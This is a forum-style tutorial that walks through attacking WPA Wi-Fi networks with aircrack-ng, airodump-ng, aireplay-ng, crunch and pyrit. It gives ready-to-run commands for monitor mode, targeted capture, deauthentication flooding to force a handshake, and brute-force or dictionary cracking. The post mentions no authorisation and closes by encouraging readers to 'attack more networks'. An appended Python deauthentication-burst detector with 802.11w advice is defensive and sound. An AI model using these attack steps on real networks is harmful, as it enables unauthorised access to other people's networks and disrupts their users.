Capture a handshake and crack it, with crunch and how to use it on Chromebook

2014-12-24, 09:31
Hi, I will help you with the standard operations of a wireless network attack on Kali and Wifi Metropolis 3 on Wifislax.


1 - The first thing to do is get your wireless card into mon0 for capture and injection. It's not vital to do this, but it speeds up the attack and it's used if you are already connected to a network.

Open up a terminal and type:

sudo airmon-ng start wlan0

then hit enter

2 - It will list your wireless card and show you that mon0 is active. It has now created a virtual wireless card. Now you need to scan for the network you want to attack and capture a handshake. A handshake is the data exchange between a client (network user) and the router (the network access point, also called the 'AP').

To start scanning type:

sudo airodump-ng mon0

then hit enter

3 - It will now scan and show you the networks around you and their information, like MAC address, power, traffic, channel and clients. Once you have scanned and identified the target AP, hold down CTRL + C to cancel the running script. Now you can tell the wireless card to only capture data packets from this network.

To capture the data type:

sudo airodump-ng --bssid xx:xx:xx:xx:xx:xx -c (channel) -w (output file name) mon0

then hit enter

4 - It will now capture that data to the 'output file name'. This will be stored in the HOME folder, but do not move, rename or delete the file. There will be 5 files created with the same name but different formats. They all hold the same information but are for different uses. The file we are interested in is the 'output-file-name.cap' file. Now would be a good time to try to capture that handshake in order to retrieve the network password.

To capture the handshake open up a new terminal and type:

sudo aireplay-ng -0 10 -a (target mac address) mon0

then hit enter

With clients:

sudo aireplay-ng -0 10 -a (target mac address) -c (clients mac address) mon0

then hit enter

5 - It will now send 10 deauthentication requests to the AP and request all clients to reconnect. With clients is more effective but takes longer to type. Airodump-ng will now try to capture the handshakes in process. Once it is captured (may take 20 minutes) you can crack it. Hold down CTRL + C to stop airodump capturing data.

To crack the handshake using crunch type:

crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -a 2 -b (target mac address) -w- (output file name).cap

then hit enter

With a dictionary type:

aircrack-ng -a 2 -b (target mac address) -w (dictionary name and path) (output file name).cap

then hit enter

6. Now sit back and have a nap, this could take a few hours :)

To crack using pyrit, use the above steps 2, 3 and 4 to capture the handshake.

To crack with pyrit type:

crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r (output file name).cap -b (target mac address) -i - attack_passthrough

then hit enter

With dictionary:

pyrit -r (output file name).cap -b (target mac address) -i (dictionary file and path) (choose your attack mode)

then hit enter

Wifi Metropolis 3:

To capture a handshake and crack it with 'Wifi Metropolis 3' you just follow the on-screen GUI.

Thank you for reading and I hope this helps you and encourages you to attack more networks and improve security on your home network.
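
The deauthentication step above (step 5), seen from the monitoring side of a home network, as an added example that is not part of the original post: a sliding-window counter that flags a burst of deauthentication frames aimed at one BSSID. The log line format, the MAC addresses, the window length and the threshold are all assumptions made for this example.

```python
from collections import defaultdict, deque

WINDOW_SECONDS = 5.0  # sliding window length (assumed tuning value)
THRESHOLD = 10        # deauth frames per BSSID per window that raise an alert (assumed)

def parse_line(line):
    """Parse 'timestamp subtype src dst bssid'; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        ts = float(parts[0])
    except ValueError:
        return None
    return (ts, parts[1].lower(), *(p.lower() for p in parts[2:]))

def detect_deauth_bursts(lines, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return one alert per BSSID, raised the first time its deauth count
    inside the sliding window reaches the threshold."""
    recent = defaultdict(deque)  # bssid -> timestamps of deauth frames still in the window
    alerted, alerts = set(), []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[1] != "deauth":
            continue  # skip garbage and every other frame type
        ts, _, _src, dst, bssid = rec
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop frames that have aged out of the window
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "first_seen": q[0], "count": len(q),
                           "broadcast": dst == "ff:ff:ff:ff:ff:ff"})
    return alerts

# Constructed sample input (not a real capture): a beacon, one routine deauth
# on another network, a malformed line, then 12 deauths in 1.2 seconds.
SAMPLE = ["100.0 beacon aa:aa:aa:00:00:01 ff:ff:ff:ff:ff:ff aa:aa:aa:00:00:01",
          "101.0 deauth bb:bb:bb:00:00:02 cc:cc:cc:00:00:03 bb:bb:bb:00:00:02",
          "garbled line"]
SAMPLE += [f"{200 + i * 0.1:.1f} deauth aa:aa:aa:00:00:01 ff:ff:ff:ff:ff:ff aa:aa:aa:00:00:01"
           for i in range(12)]

if __name__ == "__main__":
    for alert in detect_deauth_bursts(SAMPLE):
        print(alert)
```

A single deauthentication frame is normal when a client leaves a network, which is why the check counts frames per BSSID over a window. Enabling Protected Management Frames (802.11w) on the AP and its clients makes forged deauthentication frames ineffective.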